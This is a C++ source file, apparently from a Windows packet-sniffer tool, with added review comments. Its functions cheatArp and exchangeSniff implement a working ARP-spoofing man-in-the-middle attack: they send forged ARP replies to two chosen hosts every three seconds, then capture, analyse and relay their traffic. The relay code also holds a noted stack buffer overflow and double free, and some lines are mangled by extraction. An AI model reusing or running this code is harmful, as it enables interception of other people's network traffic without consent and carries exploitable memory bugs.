📄 f_winsniffdlg.cpp
int index = m_dataList.InsertItem(0,"TCP");
//记录源IP以及源端口到第1列
cs.Format("%s:%d",source_ip,ntohs(lpTcphdr->m_sport));
m_dataList.SetItem(index,1,LVIF_TEXT,cs,0,0,0,0);
//记录目的IP以及目的端口到第2列
cs.Format("%s:%d",dest_ip,ntohs(lpTcphdr->m_dport));
m_dataList.SetItem(index,2,LVIF_TEXT,cs,0,0,0,0);
//记录该记录产生的时间到第3列
//cs.Format("%d:%d",cHour,cMin);
cs=t.Format("%Y-%m-%d %H-%M-%S");
m_dataList.SetItem(index,3,LVIF_TEXT,cs,0,0,0,0);
//记录数据包大小到第4列
cs.Format("%d",(int)lpPacket->ulBytesReceived);
m_dataList.SetItem(index,4,LVIF_TEXT,cs,0,0,0,0);
//记录包含的关键字的序号到第5列
cs.Format("%d",rule_num);
m_dataList.SetItem(index,5,LVIF_TEXT,cs,0,0,0,0);
}
}
else if(lpIphdr->m_protocol==IPPROTO_UDP)//UDP包处理
{
//获取UDP包头信息,偏移地址为buf + lpBpfhdr的长度 + ET_HEADER的长度 + IP_HEADER的长度
UDP_HEADER *lpUdphdr=(UDP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+ET_HEADER_size+IP_HEADER_size);
rule_num=checkkey(buf,(int)lpPacket->ulBytesReceived)+1;
if(rule_num>0)
{
//记录协议类型到第0列
int index = m_dataList.InsertItem(0,"UDP");
//记录源IP以及源端口到第1列
cs.Format("%s:%d",source_ip,ntohs(lpUdphdr->m_sport));
m_dataList.SetItem(index,1,LVIF_TEXT,cs,0,0,0,0);
//记录目的IP以及目的端口到第2列
cs.Format("%s:%d",dest_ip,ntohs(lpUdphdr->m_dport));
m_dataList.SetItem(index,2,LVIF_TEXT,cs,0,0,0,0);
//记录该记录产生的时间到第3列
//cs.Format("%d:%d",cHour,cMin);
cs=t.Format("%Y-%m-%d %H-%M-%S");
m_dataList.SetItem(index,3,LVIF_TEXT,cs,0,0,0,0);
//记录数据包大小到第4列
cs.Format("%d",(int)lpPacket->ulBytesReceived);
m_dataList.SetItem(index,4,LVIF_TEXT,cs,0,0,0,0);
//记录包含的关键字的序号到第5列
cs.Format("%d",rule_num);
m_dataList.SetItem(index,5,LVIF_TEXT,cs,0,0,0,0);
}
}
}
}
void CF_WinSniffDlg::OnChangeModal()
{
    // Handler for a selection change in the m_modal control.
    //   selection 1: enable the IDC_CHECKALL / IDC_CHECKPTOP radio buttons
    //                and set m_isNormal.
    //   selection 0: force IDC_CHECKPTOP, run its handler, then disable both
    //                radio buttons and clear m_isNormal.
    // Any other selection value leaves the dialog untouched.
    const int selection = m_modal.GetCurSel();

    if (selection == 1)
    {
        GetDlgItem(IDC_CHECKALL)->EnableWindow(TRUE);
        GetDlgItem(IDC_CHECKPTOP)->EnableWindow(TRUE);
        m_isNormal = TRUE;
        return;
    }

    if (selection != 0)
    {
        return;
    }

    CheckRadioButton(IDC_CHECKALL, IDC_CHECKPTOP, IDC_CHECKPTOP);
    OnCheckPtop();
    GetDlgItem(IDC_CHECKALL)->EnableWindow(FALSE);
    GetDlgItem(IDC_CHECKPTOP)->EnableWindow(FALSE);
    m_isNormal = FALSE;
}
void CF_WinSniffDlg::getAdapter()
{
    // Populate the adapter list control with one "Adapter N" label (1-based)
    // for each of the m_localAdapterNum adapters, then select the first entry.
    CString label;
    int ordinal = 0;
    while (ordinal < m_localAdapterNum)
    {
        ++ordinal;
        label.Format("Adapter %d", ordinal);
        m_adapter.AddString(label);
    }
    m_adapter.SetCurSel(0);
}
void CF_WinSniffDlg::OnChangeAdapter()
{
    // Remember which entry of the adapter list is currently selected.
    // NOTE(review): the stored value is later used unchecked as an array index
    // (mac[]/IP[] in getLocalMac, adapter_list[] in exchangeSniff); a negative
    // "no selection" result from GetCurSel() would index out of bounds there.
    const int selected = m_adapter.GetCurSel();
    m_indexOfAdapter = selected;
}
// Thread entry point: builds one Ethernet + ARP reply frame from the
// CHEATARP_INFO passed in `param` and re-sends it through the global lpAdapter
// every 3 seconds for as long as the global isRun flag stays TRUE.
//
// The frame claims that IP `simulateIP` is reachable at `localMac` and is
// addressed to `targetMac` / `targetIP`. On the wire this is an unsolicited ARP
// reply (opcode 2) repeated at a fixed 3-second interval that rebinds an
// existing IP to a different MAC, which is the pattern ARP-cache monitoring and
// switch-side ARP inspection are designed to flag.
//
// param:   pointer to a CHEATARP_INFO; it is copied on entry.
// returns: always 0.
//
// NOTE(review): `param` is not checked for NULL, and the result of
// PacketAllocatePacket() is used without a NULL check.
// NOTE(review): lpAdapter and isRun are not declared in this function; they are
// presumably globals shared with exchangeSniff, with no visible synchronisation.
DWORD WINAPI cheatArp(void *param)
{
CHEATARP_INFO info={0};
memcpy(&info,param,sizeof(CHEATARP_INFO));
ET_HEADER et_header={0};
ARP_HEADER arp_header={0};
char buffer[512]={0};
// Build the forged ARP reply:
memcpy(et_header.eh_src,info.localMac,6);
memcpy(et_header.eh_dst,info.targetMac,6);
et_header.eh_type=htons(0x0806); // EtherType 0x0806 marks the frame as ARP
arp_header.arp_hdr=htons(0x0001); // hardware address type: Ethernet
arp_header.arp_pro=htons(0x0800); // protocol address type: IP
arp_header.arp_hln=6; // hardware address length is 6
arp_header.arp_pln=4; // protocol address length is 4
arp_header.arp_opt=htons(0x0002); // opcode 2: ARP reply
arp_header.arp_spa=inet_addr(info.simulateIP); // sender protocol address (source_ip)
memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr(info.targetIP); // target protocol address (target_ip)
memcpy(arp_header.arp_tha,et_header.eh_dst,6);
// NOTE(review): assumes sizeof(ET_HEADER)+sizeof(ARP_HEADER) <= 512 and that both
// structs are packed to the wire layout; their definitions are not visible here.
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
// Send the forged ARP reply:
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket(); // allocate the PACKET structure
// The whole 512-byte buffer is registered as the packet, not just the two headers.
PacketInitPacket(lpPacket,buffer,sizeof(buffer)); // initialise the PACKET structure
if(PacketSetNumWrites(lpAdapter,1)==FALSE) // set the number of sends per write
{
MessageBox(0,"warning: Unable to send more than one packet in a single write!","",0);
}
while(isRun==TRUE)
{
PacketSendPacket(lpAdapter,lpPacket,TRUE); // keep re-sending the forged ARP reply so the target host stays deceived
Sleep(3000);
}
PacketFreePacket(lpPacket); // release lpPacket
return 0;
}
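// Returns the value (0-15) of one ASCII hex digit, or -1 if `c` is not a hex digit.
static int StrToMac_hexNibble(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

// Converts a 12-character hex string (e.g. "00e04c01336e") into a 6-byte MAC address.
//
// str: NUL-terminated text holding two hex digits per byte, no separators.
// mac: output buffer of at least 6 bytes; all 6 bytes are always written.
//
// Changes from the original implementation:
//  - digits were parsed with atoi(&temp) on a single char that is not
//    NUL-terminated, so atoi could read past it; digits are now decoded directly;
//  - upper-case A-F is accepted in addition to lower-case a-f;
//  - parsing stops at the end of a short string instead of reading beyond its
//    terminator; the bytes that could not be parsed are set to 0;
//  - NULL arguments are ignored instead of being dereferenced.
// A character that is not a hex digit still contributes 0, as before.
void StrToMac(char *str,char *mac)
{
    if (!str || !mac)
    {
        return;
    }

    bool exhausted = false;
    for (int i = 0; i < 6; i++)
    {
        int high = 0;
        int low = 0;
        if (!exhausted)
        {
            if (str[0] == '\0' || str[1] == '\0')
            {
                // Fewer than two characters left: never step past the terminator.
                exhausted = true;
            }
            else
            {
                high = StrToMac_hexNibble(str[0]);
                low = StrToMac_hexNibble(str[1]);
                if (high < 0) high = 0;
                if (low < 0) low = 0;
                str += 2;
            }
        }
        mac[i] = (char)(high * 16 + low);
    }
}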
//00e04c01336e
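// Looks up the MAC address and first IPv4 address of the adapter selected in the
// dialog (pthis->m_indexOfAdapter) and copies them to the caller.
//
// localMac: receives 12 lower-case hex characters (no separators).
// localIP:  receives the dotted-decimal address string.
//
// Both outputs are copied WITHOUT a terminating NUL, exactly as before, so the
// caller must pass zero-initialised buffers large enough for the text.
//
// Changes from the original implementation:
//  - the adapter list from malloc() was never freed, because the only pointer to
//    it was advanced while walking the list; the head is now kept and freed;
//  - the malloc() result and the second GetAdaptersInfo() result are checked;
//  - m_indexOfAdapter is range-checked before it indexes the 5-entry tables
//    (out-of-range used to read outside mac[]/IP[]); when it is out of range
//    nothing is copied and the caller's buffers are left as they were.
void getLocalMac(char *localMac,char *localIP)
{
    enum { kMaxAdapters = 5 };
    char mac[kMaxAdapters][20]={0},IP[kMaxAdapters][20]={0};
    ULONG sizeOfAdapterInfo=0;

    // First call with a NULL buffer only reports the required size.
    GetAdaptersInfo(NULL,&sizeOfAdapterInfo);
    if(sizeOfAdapterInfo!=0)
    {
        IP_ADAPTER_INFO *adapterList=(IP_ADAPTER_INFO *)malloc(sizeOfAdapterInfo);
        if(adapterList!=NULL)
        {
            memset(adapterList,0,sizeOfAdapterInfo);
            if(GetAdaptersInfo(adapterList,&sizeOfAdapterInfo)==NO_ERROR)
            {
                IP_ADAPTER_INFO *cur=adapterList;
                for(int i=0;( (i<kMaxAdapters) && (cur!=NULL) );i++)
                {
                    sprintf(mac[i],"%02x%02x%02x%02x%02x%02x",cur->Address[0],cur->Address[1],cur->Address[2],
                            cur->Address[3],cur->Address[4],cur->Address[5]);
                    // Bounded copy; the row was zero-filled, so it stays NUL-terminated.
                    strncpy(IP[i],cur->IpAddressList.IpAddress.String,sizeof(IP[i])-1);
                    cur=cur->Next;
                }
            }
            free(adapterList);
        }
    }

    const int selected=pthis->m_indexOfAdapter;
    if( (selected<0) || (selected>=kMaxAdapters) )
    {
        return;
    }
    memcpy(localMac,mac[selected],strlen(mac[selected]));
    memcpy(localIP,IP[selected],strlen(IP[selected]));
    return;
}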
// Resolves the MAC address of a remote host with SendARP().
//
// remoteMac: output buffer; receives 6 raw bytes on success.
// remoteIP:  dotted-decimal IPv4 address of the host to resolve.
// returns:   TRUE on success; FALSE (after showing a message box) when
//            WSAStartup() or SendARP() fails.
//
// NOTE(review): WSAStartup() is called on every invocation and no matching
// WSACleanup() is visible in this function.
// NOTE(review): the result of inet_addr() is passed on without checking for a
// parse failure, and a 6-byte char array is handed to SendARP() as a PULONG.
bool getRemoteMac(char *remoteMac,char *remoteIP)
{
    WSADATA winsockInfo;
    if(WSAStartup(MAKEWORD(2,1), &winsockInfo)!=0)
    {
        MessageBox(0,"WSAStartup error!","",0);
        return FALSE;
    }

    char resolvedMac[6]={0};
    ULONG resolvedLen=6;
    const ULONG targetAddr=inet_addr(remoteIP);
    const DWORD arpStatus=SendARP(targetAddr, (unsigned long)NULL,(PULONG)&resolvedMac, &resolvedLen);

    if(arpStatus==NO_ERROR)
    {
        memcpy(remoteMac,resolvedMac,6);
        return TRUE;
    }

    MessageBox(0,"Get remote MAC failed!","",0);
    return FALSE;
}
// Thread entry point for the "exchange" (switched-network) capture mode.
//
// Steps, as written below:
//   1. enumerate the packet-driver adapters and open the one selected in the
//      dialog (pthis->m_indexOfAdapter) into the global lpAdapter;
//   2. read the two IP addresses from the dialog (m_ip1 / m_ip2) and resolve the
//      local MAC and both remote MACs;
//   3. start two cheatArp threads, one per host, each presenting the other
//      host's IP with the local MAC;
//   4. loop while isRun is TRUE: receive a frame, and if it is an IP packet
//      between the two hosts, pass it to pthis->assay() and re-send it with the
//      destination MAC rewritten to the real host.
//
// From a network-monitoring point of view this leaves two IP addresses mapped
// to the same MAC in both hosts' ARP caches, with every relayed frame appearing
// twice on the segment.
//
// no:      unused.
// returns: 0 when the loop ends, 1 or -1 (as DWORD) on the setup failures below.
//
// NOTE(review): pthis, lpAdapter and isRun are not declared here; presumably
// file-level globals. None of the early-return paths after PacketOpenAdapter()
// closes the adapter; no close call is visible in this function.
DWORD WINAPI exchangeSniff(void *no)
{
static CHAR adapter_list[10][1024];
WCHAR adapter_name[2048];
WCHAR *name1,*name2;
ULONG adapter_length=4096;
ULONG i,adapter_num=0;
// Get the names of all adapters.
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
// adapter_name: a caller-allocated buffer that receives the adapter names,
// a run of Unicode strings separated by a Unicode "\0", each one the name of a NIC
// adapter_length: the size of that buffer
MessageBox(0,"PacketGetAdapterNames error!","",0);
return 1;
}
name1=adapter_name;
name2=adapter_name;
i = 0;
// Copy the adapters in adapter_name into adapter_list[] one by one; i starts at 0 for the first
// NOTE(review): on the first iteration name1 == adapter_name, so *(name1-1)
// reads the element before the start of the array.
// NOTE(review): i is never compared with the 10 rows of adapter_list, and
// 2*(name1-name2) is never compared with the 1024 bytes of a row, so a long or
// numerous name list writes past the static array.
while((*name1!='\0') || (*(name1-1)!='\0'))
{
if(*name1=='\0')
{
memcpy(adapter_list[i],name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
// Open the selected adapter; adapter_list[m_indexOfAdapter] is its name.
// On success a pointer to a correctly initialised ADAPTER object is returned; otherwise NULL.
// NOTE(review): m_indexOfAdapter is not checked against the 10 rows or against i.
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[pthis->m_indexOfAdapter]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
MessageBox(0,"Unable to open the driver!","",0);
return 1;
}
// Put the NIC into directed mode
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_DIRECTED)==FALSE)
{
MessageBox(0,"Warning: Unable to set the adapter to directed mode!","",0);
}
// Set the size of the kernel-level capture buffer
if(PacketSetBuff(lpAdapter,8*1024)==FALSE)
{
MessageBox(0,"PacketSetBuff Error!","",0);
return -1;
}
// MessageBox(0,"Exchange sniff!","",0);
DWORD Addr=0;
char *IP=NULL,IP1[20]={0},IP2[20]={0};
if( ( pthis->m_ip1.IsBlank() ) || ( pthis->m_ip2.IsBlank() ) )
{
MessageBox(0,"Please fill in the IP!","",0);
return -1;
}
// Convert each dialog address to network byte order, then to dotted-decimal text.
pthis->m_ip1.GetAddress(Addr);
Addr = htonl(Addr);
IP = inet_ntoa(*(in_addr*)&Addr);
memcpy(IP1,IP,strlen(IP));
Addr=0;
pthis->m_ip2.GetAddress(Addr);
Addr = htonl(Addr);
IP = inet_ntoa(*(in_addr*)&Addr);
memcpy(IP2,IP,strlen(IP));
char localStrMac[20]={0},localIP[20]={0},localMac[6]={0};
getLocalMac(localStrMac,localIP);
StrToMac(localStrMac,localMac);
char remoteMac1[6]={0},remoteMac2[6]={0};
if(getRemoteMac(remoteMac1,IP1)==FALSE)
{
return -1;
}
if(getRemoteMac(remoteMac2,IP2)==FALSE)
{
return -1;
}
// param1 is sent to host 1 and presents host 2's IP; param2 is the mirror image.
CHEATARP_INFO param1={0},param2={0};
memcpy(param1.targetIP,IP1,strlen(IP1));
memcpy(param1.targetMac,remoteMac1,6);
memcpy(param1.simulateIP,IP2,strlen(IP2));
memcpy(param1.localMac,localMac,6);
memcpy(param2.targetIP,IP2,strlen(IP2));
memcpy(param2.targetMac,remoteMac2,6);
memcpy(param2.simulateIP,IP1,strlen(IP1));
memcpy(param2.localMac,localMac,6);
DWORD ID1=0,ID2=0;
// NOTE(review): the fourth argument on the next two lines appears mangled by the
// page's HTML extraction; presumably it was the address of param1 / param2.
// The thread handles returned by CreateThread are discarded and never closed,
// and the arguments point at locals of this function.
CreateThread(NULL,0,cheatArp,¶m1,0,&ID1);
CreateThread(NULL,0,cheatArp,¶m2,0,&ID2);
PacketSetBuff(lpAdapter,2048); // set the NIC's receive buffer size (replaces the 8*1024 set above)
PacketSetReadTimeout(lpAdapter,2); // set the "rest" time after a packet has been received
char buf[1024]={0};
LPPACKET lpPacket;
while(isRun==TRUE)
{
// NOTE(review): neither the allocation nor the receive result is checked.
lpPacket=PacketAllocatePacket(); // allocate the PACKET structure
PacketInitPacket(lpPacket,buf,sizeof(buf)); // initialise the PACKET structure
PacketReceivePacket(lpAdapter, lpPacket, TRUE); // receive packets
char *pBuf;
ET_HEADER *lpEthdr;
bpf_hdr *lpBpfhdr;
bool isAssay=FALSE;
DWORD sIP=0,dIP=0;
char source_ip[20]={0},dest_ip[20]={0};
in_addr addr={0};
// lpPacket->Buffer was initialised to buf above, so pBuf and buf address the same bytes.
pBuf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)pBuf;
// NOTE(review): bh_hdrlen is used as an offset without being compared with
// the number of bytes actually received or with sizeof(buf).
lpEthdr=(ET_HEADER *)(pBuf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800)) // EtherType 0x0800 means an IP packet
{
IP_HEADER *lpIphdr=(IP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER));
sIP=lpIphdr->m_sIP;
dIP=lpIphdr->m_dIP;
addr.S_un.S_addr=sIP;
memcpy(source_ip,inet_ntoa(addr),strlen(inet_ntoa(addr)));
memset(&addr,0,sizeof(in_addr));
addr.S_un.S_addr=dIP;
memcpy(dest_ip,inet_ntoa(addr),strlen(inet_ntoa(addr)));
// Only traffic between the two configured hosts, in either direction, is handled.
if( ( strcmp(source_ip,IP1) == 0 ) && ( strcmp(dest_ip,IP2) == 0 ) )
{
isAssay=TRUE;
}
else if( ( strcmp(source_ip,IP2) == 0 ) && ( strcmp(dest_ip,IP1) == 0 ) )
{
isAssay=TRUE;
}
if(isAssay==TRUE)
{
pthis->assay(lpPacket); // analyse the packet
// The following sends the sniffed packet on to its real destination:
LPPACKET lpSendPacket=NULL;
char sendBuf[1024]={0};
if(strcmp(dest_ip,IP1)==0)
{
memcpy(lpEthdr->eh_dst,remoteMac1,6);
}
else if(strcmp(dest_ip,IP2)==0)
{
memcpy(lpEthdr->eh_dst,remoteMac2,6);
}
memcpy(sendBuf,lpEthdr,sizeof(ET_HEADER));
// NOTE(review): stack buffer overflow on untrusted input. The copy length is
// the IP total-length field taken straight from the received packet (up to
// 65535), while sendBuf has 1024 bytes minus sizeof(ET_HEADER) left and the
// source buf holds at most 1024 bytes. The length needs to be validated
// against both buffers, and the frame dropped when it does not fit, before
// this copy.
memcpy(sendBuf+sizeof(ET_HEADER),lpIphdr,ntohs(lpIphdr->m_tlen));
lpSendPacket=PacketAllocatePacket();
// The full 1024-byte sendBuf is registered, whatever the real frame length is.
PacketInitPacket(lpSendPacket,sendBuf,sizeof(sendBuf));
PacketSetNumWrites(lpAdapter,1);
PacketSendPacket(lpAdapter,lpSendPacket,TRUE); // the packet being sent must not be too large
PacketFreePacket(lpSendPacket); // release the PACKET structure
}
}
// Reset lpPacket after every receive:
PacketFreePacket(lpPacket);
memset(buf,0,sizeof(buf));
}
// NOTE(review): lpPacket was already freed at the end of the last loop iteration
// (or was never assigned if the loop body did not run), so this second free acts
// on a stale or uninitialised pointer.
PacketFreePacket(lpPacket); // release lpPacket
return 0;
}